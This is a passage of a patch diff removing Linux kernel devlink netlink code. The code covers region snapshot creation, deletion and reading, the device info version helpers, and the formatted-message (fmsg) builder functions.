+-	struct devlink_snapshot *snapshot;
+-	struct devlink_port *port = NULL;
+-	struct devlink_region *region;
+-	const char *region_name;
+-	unsigned int index;
+-	u32 snapshot_id;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME) ||
+-	    GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_SNAPSHOT_ID))
+-		return -EINVAL;
+-
+-	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
+-	snapshot_id = nla_get_u32(info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port)
+-			return -ENODEV;
+-	}
+-
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region)
+-		return -EINVAL;
+-
+-	mutex_lock(&region->snapshot_lock);
+-	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
+-	if (!snapshot) {
+-		mutex_unlock(&region->snapshot_lock);
+-		return -EINVAL;
+-	}
+-
+-	devlink_region_snapshot_del(region, snapshot);
+-	mutex_unlock(&region->snapshot_lock);
+-	return 0;
+-}
+-
+-static int
+-devlink_nl_cmd_region_new(struct sk_buff *skb, struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct devlink_snapshot *snapshot;
+-	struct devlink_port *port = NULL;
+-	struct nlattr *snapshot_id_attr;
+-	struct devlink_region *region;
+-	const char *region_name;
+-	unsigned int index;
+-	u32 snapshot_id;
+-	u8 *data;
+-	int err;
+-
+-	if (GENL_REQ_ATTR_CHECK(info, DEVLINK_ATTR_REGION_NAME)) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "No region name provided");
+-		return -EINVAL;
+-	}
+-
+-	region_name = nla_data(info->attrs[DEVLINK_ATTR_REGION_NAME]);
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port)
+-			return -ENODEV;
+-	}
+-
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not exist");
+-		return -EINVAL;
+-	}
+-
+-	if (!region->ops->snapshot) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "The requested region does not support taking an immediate snapshot");
+-		return -EOPNOTSUPP;
+-	}
+-
+-	mutex_lock(&region->snapshot_lock);
+-
+-	if (region->cur_snapshots == region->max_snapshots) {
+-		NL_SET_ERR_MSG_MOD(info->extack, "The region has reached the maximum number of stored snapshots");
+-		err = -ENOSPC;
+-		goto unlock;
+-	}
+-
+-	snapshot_id_attr = info->attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID];
+-	if (snapshot_id_attr) {
+-		snapshot_id = nla_get_u32(snapshot_id_attr);
+-
+-		if (devlink_region_snapshot_get_by_id(region, snapshot_id)) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "The requested snapshot id is already in use");
+-			err = -EEXIST;
+-			goto unlock;
+-		}
+-
+-		err = __devlink_snapshot_id_insert(devlink, snapshot_id);
+-		if (err)
+-			goto unlock;
+-	} else {
+-		err = __devlink_region_snapshot_id_get(devlink, &snapshot_id);
+-		if (err) {
+-			NL_SET_ERR_MSG_MOD(info->extack, "Failed to allocate a new snapshot id");
+-			goto unlock;
+-		}
+-	}
+-
+-	if (port)
+-		err = region->port_ops->snapshot(port, region->port_ops,
+-						 info->extack, &data);
+-	else
+-		err = region->ops->snapshot(devlink, region->ops,
+-					    info->extack, &data);
+-	if (err)
+-		goto err_snapshot_capture;
+-
+-	err = __devlink_region_snapshot_create(region, data, snapshot_id);
+-	if (err)
+-		goto err_snapshot_create;
+-
+-	if (!snapshot_id_attr) {
+-		struct sk_buff *msg;
+-
+-		snapshot = devlink_region_snapshot_get_by_id(region,
+-							     snapshot_id);
+-		if (WARN_ON(!snapshot)) {
+-			err = -EINVAL;
+-			goto unlock;
+-		}
+-
+-		msg = devlink_nl_region_notify_build(region, snapshot,
+-						     DEVLINK_CMD_REGION_NEW,
+-						     info->snd_portid,
+-						     info->snd_seq);
+-		err = PTR_ERR_OR_ZERO(msg);
+-		if (err)
+-			goto err_notify;
+-
+-		err = genlmsg_reply(msg, info);
+-		if (err)
+-			goto err_notify;
+-	}
+-
+-	mutex_unlock(&region->snapshot_lock);
+-	return 0;
+-
+-err_snapshot_create:
+-	region->ops->destructor(data);
+-err_snapshot_capture:
+-	__devlink_snapshot_id_decrement(devlink, snapshot_id);
+-	mutex_unlock(&region->snapshot_lock);
+-	return err;
+-
+-err_notify:
+-	devlink_region_snapshot_del(region, snapshot);
+-unlock:
+-	mutex_unlock(&region->snapshot_lock);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_read_chunk_fill(struct sk_buff *msg,
+-						 struct devlink *devlink,
+-						 u8 *chunk, u32 chunk_size,
+-						 u64 addr)
+-{
+-	struct nlattr *chunk_attr;
+-	int err;
+-
+-	chunk_attr = nla_nest_start_noflag(msg, DEVLINK_ATTR_REGION_CHUNK);
+-	if (!chunk_attr)
+-		return -EINVAL;
+-
+-	err = nla_put(msg, DEVLINK_ATTR_REGION_CHUNK_DATA, chunk_size, chunk);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_u64_64bit(msg, DEVLINK_ATTR_REGION_CHUNK_ADDR, addr,
+-				DEVLINK_ATTR_PAD);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(msg, chunk_attr);
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(msg, chunk_attr);
+-	return err;
+-}
+-
+-#define DEVLINK_REGION_READ_CHUNK_SIZE 256
+-
+-static int devlink_nl_region_read_snapshot_fill(struct sk_buff *skb,
+-						struct devlink *devlink,
+-						struct devlink_region *region,
+-						struct nlattr **attrs,
+-						u64 start_offset,
+-						u64 end_offset,
+-						u64 *new_offset)
+-{
+-	struct devlink_snapshot *snapshot;
+-	u64 curr_offset = start_offset;
+-	u32 snapshot_id;
+-	int err = 0;
+-
+-	*new_offset = start_offset;
+-
+-	snapshot_id = nla_get_u32(attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]);
+-	snapshot = devlink_region_snapshot_get_by_id(region, snapshot_id);
+-	if (!snapshot)
+-		return -EINVAL;
+-
+-	while (curr_offset < end_offset) {
+-		u32 data_size;
+-		u8 *data;
+-
+-		if (end_offset - curr_offset < DEVLINK_REGION_READ_CHUNK_SIZE)
+-			data_size = end_offset - curr_offset;
+-		else
+-			data_size = DEVLINK_REGION_READ_CHUNK_SIZE;
+-
+-		data = &snapshot->data[curr_offset];
+-		err = devlink_nl_cmd_region_read_chunk_fill(skb, devlink,
+-							    data, data_size,
+-							    curr_offset);
+-		if (err)
+-			break;
+-
+-		curr_offset += data_size;
+-	}
+-	*new_offset = curr_offset;
+-
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_region_read_dumpit(struct sk_buff *skb,
+-					     struct netlink_callback *cb)
+-{
+-	const struct genl_dumpit_info *info = genl_dumpit_info(cb);
+-	u64 ret_offset, start_offset, end_offset = U64_MAX;
+-	struct nlattr **attrs = info->attrs;
+-	struct devlink_port *port = NULL;
+-	struct devlink_region *region;
+-	struct nlattr *chunks_attr;
+-	const char *region_name;
+-	struct devlink *devlink;
+-	unsigned int index;
+-	void *hdr;
+-	int err;
+-
+-	start_offset = *((u64 *)&cb->args[0]);
+-
+-	devlink = devlink_get_from_attrs(sock_net(cb->skb->sk), attrs);
+-	if (IS_ERR(devlink))
+-		return PTR_ERR(devlink);
+-
+-	devl_lock(devlink);
+-
+-	if (!attrs[DEVLINK_ATTR_REGION_NAME] ||
+-	    !attrs[DEVLINK_ATTR_REGION_SNAPSHOT_ID]) {
+-		err = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	if (info->attrs[DEVLINK_ATTR_PORT_INDEX]) {
+-		index = nla_get_u32(info->attrs[DEVLINK_ATTR_PORT_INDEX]);
+-
+-		port = devlink_port_get_by_index(devlink, index);
+-		if (!port) {
+-			err = -ENODEV;
+-			goto out_unlock;
+-		}
+-	}
+-
+-	region_name = nla_data(attrs[DEVLINK_ATTR_REGION_NAME]);
+-
+-	if (port)
+-		region = devlink_port_region_get_by_name(port, region_name);
+-	else
+-		region = devlink_region_get_by_name(devlink, region_name);
+-
+-	if (!region) {
+-		err = -EINVAL;
+-		goto out_unlock;
+-	}
+-
+-	if (attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR] &&
+-	    attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]) {
+-		if (!start_offset)
+-			start_offset =
+-				nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
+-
+-		end_offset = nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_ADDR]);
+-		end_offset += nla_get_u64(attrs[DEVLINK_ATTR_REGION_CHUNK_LEN]);
+-	}
+-
+-	if (end_offset > region->size)
+-		end_offset = region->size;
+-
+-	/* return 0 if there is no further data to read */
+-	if (start_offset == end_offset) {
+-		err = 0;
+-		goto out_unlock;
+-	}
+-
+-	hdr = genlmsg_put(skb, NETLINK_CB(cb->skb).portid, cb->nlh->nlmsg_seq,
+-			  &devlink_nl_family, NLM_F_ACK | NLM_F_MULTI,
+-			  DEVLINK_CMD_REGION_READ);
+-	if (!hdr) {
+-		err = -EMSGSIZE;
+-		goto out_unlock;
+-	}
+-
+-	err = devlink_nl_put_handle(skb, devlink);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	if (region->port) {
+-		err = nla_put_u32(skb, DEVLINK_ATTR_PORT_INDEX,
+-				  region->port->index);
+-		if (err)
+-			goto nla_put_failure;
+-	}
+-
+-	err = nla_put_string(skb, DEVLINK_ATTR_REGION_NAME, region_name);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	chunks_attr = nla_nest_start_noflag(skb, DEVLINK_ATTR_REGION_CHUNKS);
+-	if (!chunks_attr) {
+-		err = -EMSGSIZE;
+-		goto nla_put_failure;
+-	}
+-
+-	err = devlink_nl_region_read_snapshot_fill(skb, devlink,
+-						   region, attrs,
+-						   start_offset,
+-						   end_offset, &ret_offset);
+-
+-	if (err && err != -EMSGSIZE)
+-		goto nla_put_failure;
+-
+-	/* Check if there was any progress done to prevent infinite loop */
+-	if (ret_offset == start_offset) {
+-		err = -EINVAL;
+-		goto nla_put_failure;
+-	}
+-
+-	*((u64 *)&cb->args[0]) = ret_offset;
+-
+-	nla_nest_end(skb, chunks_attr);
+-	genlmsg_end(skb, hdr);
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-	return skb->len;
+-
+-nla_put_failure:
+-	genlmsg_cancel(skb, hdr);
+-out_unlock:
+-	devl_unlock(devlink);
+-	devlink_put(devlink);
+-	return err;
+-}
+-
+-int devlink_info_driver_name_put(struct devlink_info_req *req, const char *name)
+-{
+-	if (!req->msg)
+-		return 0;
+-	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_DRIVER_NAME, name);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_driver_name_put);
+-
+-int devlink_info_serial_number_put(struct devlink_info_req *req, const char *sn)
+-{
+-	if (!req->msg)
+-		return 0;
+-	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_SERIAL_NUMBER, sn);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_serial_number_put);
+-
+-int devlink_info_board_serial_number_put(struct devlink_info_req *req,
+-					 const char *bsn)
+-{
+-	if (!req->msg)
+-		return 0;
+-	return nla_put_string(req->msg, DEVLINK_ATTR_INFO_BOARD_SERIAL_NUMBER,
+-			      bsn);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_board_serial_number_put);
+-
+-static int devlink_info_version_put(struct devlink_info_req *req, int attr,
+-				    const char *version_name,
+-				    const char *version_value,
+-				    enum devlink_info_version_type version_type)
+-{
+-	struct nlattr *nest;
+-	int err;
+-
+-	if (req->version_cb)
+-		req->version_cb(version_name, version_type,
+-				req->version_cb_priv);
+-
+-	if (!req->msg)
+-		return 0;
+-
+-	nest = nla_nest_start_noflag(req->msg, attr);
+-	if (!nest)
+-		return -EMSGSIZE;
+-
+-	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_NAME,
+-			     version_name);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	err = nla_put_string(req->msg, DEVLINK_ATTR_INFO_VERSION_VALUE,
+-			     version_value);
+-	if (err)
+-		goto nla_put_failure;
+-
+-	nla_nest_end(req->msg, nest);
+-
+-	return 0;
+-
+-nla_put_failure:
+-	nla_nest_cancel(req->msg, nest);
+-	return err;
+-}
+-
+-int devlink_info_version_fixed_put(struct devlink_info_req *req,
+-				   const char *version_name,
+-				   const char *version_value)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_FIXED,
+-					version_name, version_value,
+-					DEVLINK_INFO_VERSION_TYPE_NONE);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_fixed_put);
+-
+-int devlink_info_version_stored_put(struct devlink_info_req *req,
+-				    const char *version_name,
+-				    const char *version_value)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
+-					version_name, version_value,
+-					DEVLINK_INFO_VERSION_TYPE_NONE);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_stored_put);
+-
+-int devlink_info_version_stored_put_ext(struct devlink_info_req *req,
+-					const char *version_name,
+-					const char *version_value,
+-					enum devlink_info_version_type version_type)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_STORED,
+-					version_name, version_value,
+-					version_type);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_stored_put_ext);
+-
+-int devlink_info_version_running_put(struct devlink_info_req *req,
+-				     const char *version_name,
+-				     const char *version_value)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
+-					version_name, version_value,
+-					DEVLINK_INFO_VERSION_TYPE_NONE);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_running_put);
+-
+-int devlink_info_version_running_put_ext(struct devlink_info_req *req,
+-					 const char *version_name,
+-					 const char *version_value,
+-					 enum devlink_info_version_type version_type)
+-{
+-	return devlink_info_version_put(req, DEVLINK_ATTR_INFO_VERSION_RUNNING,
+-					version_name, version_value,
+-					version_type);
+-}
+-EXPORT_SYMBOL_GPL(devlink_info_version_running_put_ext);
+-
+-static int
+-devlink_nl_info_fill(struct sk_buff *msg, struct devlink *devlink,
+-		     enum devlink_command cmd, u32 portid,
+-		     u32 seq, int flags, struct netlink_ext_ack *extack)
+-{
+-	struct devlink_info_req req = {};
+-	void *hdr;
+-	int err;
+-
+-	hdr = genlmsg_put(msg, portid, seq, &devlink_nl_family, flags, cmd);
+-	if (!hdr)
+-		return -EMSGSIZE;
+-
+-	err = -EMSGSIZE;
+-	if (devlink_nl_put_handle(msg, devlink))
+-		goto err_cancel_msg;
+-
+-	req.msg = msg;
+-	err = devlink->ops->info_get(devlink, &req, extack);
+-	if (err)
+-		goto err_cancel_msg;
+-
+-	genlmsg_end(msg, hdr);
+-	return 0;
+-
+-err_cancel_msg:
+-	genlmsg_cancel(msg, hdr);
+-	return err;
+-}
+-
+-static int devlink_nl_cmd_info_get_doit(struct sk_buff *skb,
+-					struct genl_info *info)
+-{
+-	struct devlink *devlink = info->user_ptr[0];
+-	struct sk_buff *msg;
+-	int err;
+-
+-	if (!devlink->ops->info_get)
+-		return -EOPNOTSUPP;
+-
+-	msg = nlmsg_new(NLMSG_DEFAULT_SIZE, GFP_KERNEL);
+-	if (!msg)
+-		return -ENOMEM;
+-
+-	err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
+-				   info->snd_portid, info->snd_seq, 0,
+-				   info->extack);
+-	if (err) {
+-		nlmsg_free(msg);
+-		return err;
+-	}
+-
+-	return genlmsg_reply(msg, info);
+-}
+-
+-static int devlink_nl_cmd_info_get_dumpit(struct sk_buff *msg,
+-					  struct netlink_callback *cb)
+-{
+-	struct devlink *devlink;
+-	int start = cb->args[0];
+-	unsigned long index;
+-	int idx = 0;
+-	int err = 0;
+-
+-	devlinks_xa_for_each_registered_get(sock_net(msg->sk), index, devlink) {
+-		if (idx < start || !devlink->ops->info_get)
+-			goto inc;
+-
+-		devl_lock(devlink);
+-		err = devlink_nl_info_fill(msg, devlink, DEVLINK_CMD_INFO_GET,
+-					   NETLINK_CB(cb->skb).portid,
+-					   cb->nlh->nlmsg_seq, NLM_F_MULTI,
+-					   cb->extack);
+-		devl_unlock(devlink);
+-		if (err == -EOPNOTSUPP)
+-			err = 0;
+-		else if (err) {
+-			devlink_put(devlink);
+-			break;
+-		}
+-inc:
+-		idx++;
+-		devlink_put(devlink);
+-	}
+-
+-	if (err != -EMSGSIZE)
+-		return err;
+-
+-	cb->args[0] = idx;
+-	return msg->len;
+-}
+-
+-struct devlink_fmsg_item {
+-	struct list_head list;
+-	int attrtype;
+-	u8 nla_type;
+-	u16 len;
+-	int value[];
+-};
+-
+-struct devlink_fmsg {
+-	struct list_head item_list;
+-	bool putting_binary; /* This flag forces enclosing of binary data
+-			      * in an array brackets. It forces using
+-			      * of designated API:
+-			      * devlink_fmsg_binary_pair_nest_start()
+-			      * devlink_fmsg_binary_pair_nest_end()
+-			      */
+-};
+-
+-static struct devlink_fmsg *devlink_fmsg_alloc(void)
+-{
+-	struct devlink_fmsg *fmsg;
+-
+-	fmsg = kzalloc(sizeof(*fmsg), GFP_KERNEL);
+-	if (!fmsg)
+-		return NULL;
+-
+-	INIT_LIST_HEAD(&fmsg->item_list);
+-
+-	return fmsg;
+-}
+-
+-static void devlink_fmsg_free(struct devlink_fmsg *fmsg)
+-{
+-	struct devlink_fmsg_item *item, *tmp;
+-
+-	list_for_each_entry_safe(item, tmp, &fmsg->item_list, list) {
+-		list_del(&item->list);
+-		kfree(item);
+-	}
+-	kfree(fmsg);
+-}
+-
+-static int devlink_fmsg_nest_common(struct devlink_fmsg *fmsg,
+-				    int attrtype)
+-{
+-	struct devlink_fmsg_item *item;
+-
+-	item = kzalloc(sizeof(*item), GFP_KERNEL);
+-	if (!item)
+-		return -ENOMEM;
+-
+-	item->attrtype = attrtype;
+-	list_add_tail(&item->list, &fmsg->item_list);
+-
+-	return 0;
+-}
+-
+-int devlink_fmsg_obj_nest_start(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_OBJ_NEST_START);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_start);
+-
+-static int devlink_fmsg_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_NEST_END);
+-}
+-
+-int devlink_fmsg_obj_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_end(fmsg);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_obj_nest_end);
+-
+-#define DEVLINK_FMSG_MAX_SIZE (GENLMSG_DEFAULT_SIZE - GENL_HDRLEN - NLA_HDRLEN)
+-
+-static int devlink_fmsg_put_name(struct devlink_fmsg *fmsg, const char *name)
+-{
+-	struct devlink_fmsg_item *item;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	if (strlen(name) + 1 > DEVLINK_FMSG_MAX_SIZE)
+-		return -EMSGSIZE;
+-
+-	item = kzalloc(sizeof(*item) + strlen(name) + 1, GFP_KERNEL);
+-	if (!item)
+-		return -ENOMEM;
+-
+-	item->nla_type = NLA_NUL_STRING;
+-	item->len = strlen(name) + 1;
+-	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_NAME;
+-	memcpy(&item->value, name, item->len);
+-	list_add_tail(&item->list, &fmsg->item_list);
+-
+-	return 0;
+-}
+-
+-int devlink_fmsg_pair_nest_start(struct devlink_fmsg *fmsg, const char *name)
+-{
+-	int err;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_PAIR_NEST_START);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_put_name(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_start);
+-
+-int devlink_fmsg_pair_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_nest_end(fmsg);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_pair_nest_end);
+-
+-int devlink_fmsg_arr_pair_nest_start(struct devlink_fmsg *fmsg,
+-				     const char *name)
+-{
+-	int err;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_nest_common(fmsg, DEVLINK_ATTR_FMSG_ARR_NEST_START);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_start);
+-
+-int devlink_fmsg_arr_pair_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	int err;
+-
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	err = devlink_fmsg_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_arr_pair_nest_end);
+-
+-int devlink_fmsg_binary_pair_nest_start(struct devlink_fmsg *fmsg,
+-					const char *name)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_arr_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	fmsg->putting_binary = true;
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_start);
+-
+-int devlink_fmsg_binary_pair_nest_end(struct devlink_fmsg *fmsg)
+-{
+-	if (!fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	fmsg->putting_binary = false;
+-	return devlink_fmsg_arr_pair_nest_end(fmsg);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_nest_end);
+-
+-static int devlink_fmsg_put_value(struct devlink_fmsg *fmsg,
+-				  const void *value, u16 value_len,
+-				  u8 value_nla_type)
+-{
+-	struct devlink_fmsg_item *item;
+-
+-	if (value_len > DEVLINK_FMSG_MAX_SIZE)
+-		return -EMSGSIZE;
+-
+-	item = kzalloc(sizeof(*item) + value_len, GFP_KERNEL);
+-	if (!item)
+-		return -ENOMEM;
+-
+-	item->nla_type = value_nla_type;
+-	item->len = value_len;
+-	item->attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
+-	memcpy(&item->value, value, item->len);
+-	list_add_tail(&item->list, &fmsg->item_list);
+-
+-	return 0;
+-}
+-
+-static int devlink_fmsg_bool_put(struct devlink_fmsg *fmsg, bool value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_FLAG);
+-}
+-
+-static int devlink_fmsg_u8_put(struct devlink_fmsg *fmsg, u8 value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U8);
+-}
+-
+-int devlink_fmsg_u32_put(struct devlink_fmsg *fmsg, u32 value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U32);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u32_put);
+-
+-static int devlink_fmsg_u64_put(struct devlink_fmsg *fmsg, u64 value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, &value, sizeof(value), NLA_U64);
+-}
+-
+-int devlink_fmsg_string_put(struct devlink_fmsg *fmsg, const char *value)
+-{
+-	if (fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, value, strlen(value) + 1,
+-				      NLA_NUL_STRING);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_string_put);
+-
+-int devlink_fmsg_binary_put(struct devlink_fmsg *fmsg, const void *value,
+-			    u16 value_len)
+-{
+-	if (!fmsg->putting_binary)
+-		return -EINVAL;
+-
+-	return devlink_fmsg_put_value(fmsg, value, value_len, NLA_BINARY);
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_put);
+-
+-int devlink_fmsg_bool_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			       bool value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_bool_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_bool_pair_put);
+-
+-int devlink_fmsg_u8_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			     u8 value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_u8_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u8_pair_put);
+-
+-int devlink_fmsg_u32_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			      u32 value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_u32_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u32_pair_put);
+-
+-int devlink_fmsg_u64_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-			      u64 value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_u64_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_u64_pair_put);
+-
+-int devlink_fmsg_string_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-				 const char *value)
+-{
+-	int err;
+-
+-	err = devlink_fmsg_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_string_put(fmsg, value);
+-	if (err)
+-		return err;
+-
+-	err = devlink_fmsg_pair_nest_end(fmsg);
+-	if (err)
+-		return err;
+-
+-	return 0;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_string_pair_put);
+-
+-int devlink_fmsg_binary_pair_put(struct devlink_fmsg *fmsg, const char *name,
+-				 const void *value, u32 value_len)
+-{
+-	u32 data_size;
+-	int end_err;
+-	u32 offset;
+-	int err;
+-
+-	err = devlink_fmsg_binary_pair_nest_start(fmsg, name);
+-	if (err)
+-		return err;
+-
+-	for (offset = 0; offset < value_len; offset += data_size) {
+-		data_size = value_len - offset;
+-		if (data_size > DEVLINK_FMSG_MAX_SIZE)
+-			data_size = DEVLINK_FMSG_MAX_SIZE;
+-		err = devlink_fmsg_binary_put(fmsg, value + offset, data_size);
+-		if (err)
+-			break;
+-		/* Exit from loop with a break (instead of
+-		 * return) to make sure putting_binary is turned off in
+-		 * devlink_fmsg_binary_pair_nest_end
+-		 */
+-	}
+-
+-	end_err = devlink_fmsg_binary_pair_nest_end(fmsg);
+-	if (end_err)
+-		err = end_err;
+-
+-	return err;
+-}
+-EXPORT_SYMBOL_GPL(devlink_fmsg_binary_pair_put);
+-
+-static int
+-devlink_fmsg_item_fill_type(struct devlink_fmsg_item *msg, struct sk_buff *skb)
+-{
+-	switch (msg->nla_type) {
+-	case NLA_FLAG:
+-	case NLA_U8:
+-	case NLA_U32:
+-	case NLA_U64:
+-	case NLA_NUL_STRING:
+-	case NLA_BINARY:
+-		return nla_put_u8(skb, DEVLINK_ATTR_FMSG_OBJ_VALUE_TYPE,
+-				  msg->nla_type);
+-	default:
+-		return -EINVAL;
+-	}
+-}
+-
+-static int
+-devlink_fmsg_item_fill_data(struct devlink_fmsg_item *msg, struct sk_buff *skb)
+-{
+-	int attrtype = DEVLINK_ATTR_FMSG_OBJ_VALUE_DATA;
+-	u8 tmp;
+-
+-	switch (msg->nla_type) {
+-	case NLA_FLAG:
+-		/* Always provide flag data, regardless of its value */
+-		tmp = *(bool *) msg->value;
+-
+-		return nla_put_u8(skb, attrtype, tmp);
+-	case NLA_U8:
